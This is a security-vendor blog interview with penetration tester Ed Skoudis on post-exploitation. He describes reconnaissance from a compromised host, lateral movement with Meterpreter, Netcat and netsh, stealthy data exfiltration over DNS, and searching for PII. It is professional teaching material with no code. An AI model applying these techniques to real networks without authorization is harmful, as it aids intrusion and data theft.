Varonis announces strategic partnership with Microsoft to accelerate the secure adoption of Copilot.

Learn more

Interview with Pen Testing Expert Ed Skoudis

We’re very excited to present this Q&A with Ed Skoudis. Skoudis is a very large presence in the security world. Here’s just a snippet from his lengthy bio: founder of...
Michael Buckbee
4 min read
Published October 13, 2015
Last updated June 30, 2022

We’re very excited to present this Q&A with Ed Skoudis. Skoudis is a very large presence in the security world. Here’s just a snippet from his lengthy bio: founder of Counter Hack, sought-after instructor at the SANS Institute, creator of NetWars CyberCity, and winner of the US Army’s Order of Thor Medal.

We focused our questions on some of the essentials of post-exploitation techniques. Skoudis set us straight on definitions and methodologies. His answers also nicely complement our own series on pentesting basics.

Inside Out Security: Let’s say you’ve entered a target system and installed an APT or RAT …

Ed Skoudis: I’m not sure APT is the proper word here.  One doesn’t install an “APT”. An APT is a threat actor, specifically a very skilled one. [See this definition of APT.]

Also, I’d prefer not to install a RAT during a penetration test.  There is no need for one in modern pen testing. RATs tend to be too heavyweight and intrusive. Traditional RATs usually provide GUI control of the machine and a bunch of splashy doodads that aren’t required by a penetration tester.

Instead, when compromising a machine, I like to use a light-weight payload, such as a Metasploit Meterpreter or related tool to get some form of shell access.

IOS: Ok, so after you’re in what would be the next four or five steps you’d take?

ES: After gaining a toe-hold on the target machine, I would:

  1.  Determine the privileges I’m running with.
  2.  Determine the machine’s location on the network and its network configuration, including looking at its network interfaces (it might be dual-homed), hostname, IP address, MAC address, ARP cache, and DNS cache.  It’s important to look for both IPv4 and IPv6 information from these sources, as many systems support IPv6 in addition to IPv4, and IPv6 tends not to get as much scrutiny from security tools as IPv4, making it a nice avenue of attack.
  3. Look for the active TCP connections this machine has with other systems, especially interesting protocols such as SMB (for Windows file sharing and domain authentication) or SSH (for secure remote shell).
  4. Check to see what security tools are installed, including anti-virus, application white listing, local firewall, etc.
  5. See if I can leverage its location on the network and active TCP connections to pivot to another host.

IOS: What are some must-have tools for post-exploitation?

ES: For Windows targets, there are plentiful PowerShell tools for privilege escalation, pillaging, and pivoting.  One of the very best suite of these tools is PowerShell Empire, which rolls together some incredible functionality from a variety of other projects.

In addition to PowerShell Empire, Metasploit itself includes dozens of post-exploitation modules useful for dumping hashes, grabbing crypto keys, getting environment information (including security defenses), and much more.

IOS: What are some techniques and tools for working out local network topology?

ES: I prefer to gain as much information from a compromised machine about the network around it as I can before resorting to intrusive (and easily discovered) scanning. That’s why I like to grab ARP cache, DNS cache, and a list of active TCP connections before moving on. That information tells me about other hosts that the currently compromised one knows about.  I’ll also grab the routing table, as it may indicate additional routers on the subnet.

After pillaging that local information from a system, I then start probing to look for other targets on the same subnet, as they will likely be more accessible than systems on separate networks. A ping sweep (IPv4) or a ping of a multi-cast address (IPv6) may turn up additional nearby hosts ripe for picking and which may have identical credentials to the system(s) I’ve currently compromised!

I then typically do small-scale port scans of very interesting ports to me, those associated with protocols where I may find more juicy attack surface, including TCP 21, 22, 23, 25, 80, 443, 445, 6000, and more.

IOS: How do you go about moving around the network?

ES: I use a variety of methods for lateral movement, including the pivoting features of Meterpreter’s msfconsole route command and portfwd commands are quite useful.

On systems where Netcat is already installed (most Linuxes), I rely on Netcat relays of various types, including listener-to-client relays, but also client-to-client and listener-to-listener relays.

On Windows targets, I really love the “netsh interface portproxy” feature to forward ports through the machine, especially its ability to listen on a given port on IPv4 and then shoot data out to another port using IPv6. As far as TCP is concerned at Layer 4, it’s a single connection.  But, we switch out the underlying Layer 3 protocol (from IPv4 to IPv6) underneath a single  TCP connection. It’s beautiful.

IOS: What are the some of the ways exfiltration of data can be accomplished without it being detected?

ES: First, encryption. In many organizations, simply sending the data across a TLS connection will get the job done.  Still, they may see the large transfer.  If I need to be more subtle, I’ll consider moving data across a command-and-control channel over DNS or related protocol.  A slow dribble is far less likely to be detected than a smash-and-grab, but will still demonstrate the business risk a professional pen tester is hired to show.

IOS: How does one search for PII and other sensitive content?

ES: Understanding the business use of a compromised machine is a vital step here.  What does the machine do, and where does it store its information to do that?  This usually gets me in the right direction.

I search using typical file system commands, such as cd, ls, find, grep, and so forth on Linux, and cd, dir, findstr, etc. on Windows.  In PowerShell on Windows, we have some additional great features for searching through the file system.

There are specific tools for finding things like social security numbers and credit cards on targets, but I find that they tend to produce a lot of disk access and noise in the target environment, another items that may get a pen tester noticed and perhaps even blocked.

IOS: Finally, any recent trends you can comment on?

ES: Yes, attacks using PowerShell are really on the rise, and there are some tremendous tools like PowerShell Empire for modeling such attacks in pen tests. Furthermore, attacks against Windows Kerberos are an increasing vector today.

IOS: Thanks Ed!

What you should do now

Below are three ways we can help you begin your journey to reducing data risk at your company:

  1. Schedule a demo session with us, where we can show you around, answer your questions, and help you see if Varonis is right for you.
  2. Download our free report and learn the risks associated with SaaS data exposure.
  3. Share this blog post with someone you know who'd enjoy reading it. Share it with them via email, LinkedIn, Reddit, or Facebook.

Try Varonis free.

Get a detailed data risk report based on your company’s data.
Deploys in minutes.

Keep reading

Varonis tackles hundreds of use cases, making it the ultimate platform to stop data breaches and ensure compliance.

threat-update-43-–-ransomware-early-warning:-brute-force
Threat Update 43 – Ransomware Early Warning: Brute Force
With the proliferation of more sophisticated, human-operated ransomware, attackers can live inside an organization for days, weeks, or months - finding and exfiltrating data before making their presence known by detonating ransomware.
covid-19-threat-update-#2
COVID-19 Threat Update #2
The coronavirus crisis presents a perfect storm for attackers. Routines have been upended, employees are remote, and many will work on unpatched personal devices.  It only takes one compromised remote...
last-week-in-microsoft-teams:-week-of-january-18th
Last Week in Microsoft Teams: Week of January 18th
This week’s review covers a new data loss prevention playbook, turning PowerApps into a Teams Meeting App, and Presenter View released into Public Preview.
tips-from-the-pros:-best-practices-for-managing-large-amounts-of-shared-data
Tips From the Pros: Best Practices for Managing Large Amounts of Shared Data
In our “Tips from the Pros” series, we’ll be the presenting interviews we’ve conducted with working IT professionals. These are the admins and managers responsible for security, access, and control...